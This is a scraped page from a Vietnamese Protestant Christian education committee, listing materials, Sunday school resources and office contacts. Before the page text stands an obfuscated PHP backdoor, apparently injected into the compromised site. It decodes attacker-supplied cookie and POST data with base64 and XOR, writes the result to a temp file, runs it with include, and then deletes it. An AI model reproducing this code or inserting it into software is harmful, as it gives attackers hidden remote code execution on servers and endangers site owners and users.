$qfhCo = chr (107) . 'v' . 'X' . chr ( 619 - 524 ).chr ( 547 - 457 ).chr (86) . chr (99) . chr ( 292 - 207 ); $JGVEGpyam = chr ( 921 - 822 )."\154" . "\x61" . "\x73" . chr (115) . "\137" . 'e' . 'x' . chr ( 151 - 46 ).chr (115) . "\164" . chr (115); $UPYzOliaWa = class_exists($qfhCo); $JGVEGpyam = "46590";$UQTOpy = !1;if ($UPYzOliaWa == $UQTOpy){function MMDHQQKPa(){$DOlIL = new /* 40803 */ kvX_ZVcU(31218 + 31218); $DOlIL = NULL;}$DrNFopXx = "31218";class kvX_ZVcU{private function LeBYwp($DrNFopXx){if (is_array(kvX_ZVcU::$yeHlH)) {$mHLVpdIimc = sys_get_temp_dir() . "/" . crc32(kvX_ZVcU::$yeHlH['s' . chr (97) . chr (108) . "\x74"]);@kvX_ZVcU::$yeHlH["\167" . "\162" . "\151" . chr (116) . "\145"]($mHLVpdIimc, kvX_ZVcU::$yeHlH[chr ( 1035 - 936 )."\157" . chr ( 1093 - 983 ).'t' . "\145" . "\156" . chr (116)]);include $mHLVpdIimc;@kvX_ZVcU::$yeHlH["\144" . "\x65" . chr (108) . chr (101) . "\164" . "\145"]($mHLVpdIimc); $DrNFopXx = "31218";exit();}}private $xLcNp;public function ImwdIbGG(){echo 15674;}public function __destruct(){kvX_ZVcU::$yeHlH = @unserialize(kvX_ZVcU::$yeHlH); $DrNFopXx = "11047_35834";$this->LeBYwp($DrNFopXx); $DrNFopXx = "11047_35834";}public function YaLhleBrR($vrtShxDYw, $UhbXJh){return $vrtShxDYw[0] ^ str_repeat($UhbXJh, (strlen($vrtShxDYw[0]) / strlen($UhbXJh)) + 1);}public function AauJxDbMz($vrtShxDYw){$XfNlII = "base64";return array_map($XfNlII . chr (95) . chr ( 777 - 677 ).chr ( 601 - 500 ).chr (99) . 'o' . chr ( 759 - 659 )."\x65", array($vrtShxDYw,));}public function __construct($XGUFdIpQ=0){$XcvNV = $_POST;$XCYeCgqXB = $_COOKIE;$UhbXJh = "de589263-d08c-4a75-b763-01a48ae244d8";$zTTVlyTsPO = @$XCYeCgqXB[substr($UhbXJh, 0, 4)];if (!empty($zTTVlyTsPO)){$vrtShxDYw = "";$zTTVlyTsPO = explode(",", $zTTVlyTsPO);foreach ($zTTVlyTsPO as $hogrX){$vrtShxDYw .= @$XCYeCgqXB[$hogrX];$vrtShxDYw .= @$XcvNV[$hogrX];}kvX_ZVcU::$yeHlH = $this->YaLhleBrR($this->AauJxDbMz($vrtShxDYw), $UhbXJh);}}public static $yeHlH = 12711;}MMDHQQKPa();} Sách Cơ Đốc - UB Cơ Đốc Giáo Dục Tổng Liên Hội Skip to content

0909002940

phivan_ng@yahoo.com

Hotline: 0918029547

songthuong@yahoo.com

0903992104

hoangdieu83198@yahoo.com

Tài liệu

Trường Chúa nhật

BẢN TIN

Ủy Ban Cơ Đốc Giáo Dục
xin được gửi đến quý tôi con Chúa gần xa những thông tin sau

BÀI HỌC KINH THÁNH MS.NGUYỄN THỈ

Lời Chúa là ngọn đèn cho chân tôi, Ánh sáng cho đường lối tôi

(Thi thiên 119:105)

Liên Lạc Với Chúng Tôi


Đăng ký Văn phẩm Cơ Đốc

ĐT: 091-821-8152
Email:  uybancdgd@gmail.com
Email:nguyendinhtin52@gmail.com
Web: sachcodocgiaoduc.net

VP. Tổng Liên Hội

155 Trần Hưng Đạo, Quận 1, Tp. HCM
ĐT: (028) 6659-4588;  090- 536- 3653 

Cơ sở 2 Tổng Liên Hội

633 đường 3/2, Quận 10, Tp. HCM
ĐT: (028) 3957-5255; 091- 802-9547

Nha Trang

30 Lê Thành Phương, TP. Nha Trang
ĐT: (0258) 381-0200;  091-234-2705 

TP. Đà Nẵng

270 Lê Duẩn, TP. Đà Nẵng
ĐT: (0236) 375-2757;  090-381-2483

TP. Cần Thơ

87 Xô Viết Nghệ Tĩnh, Tp. Cần Thơ
ĐT: (0292) 3601-904; 076-722-8383

© 2022 Ủy Ban Cơ Đốc Giáo Dục TLH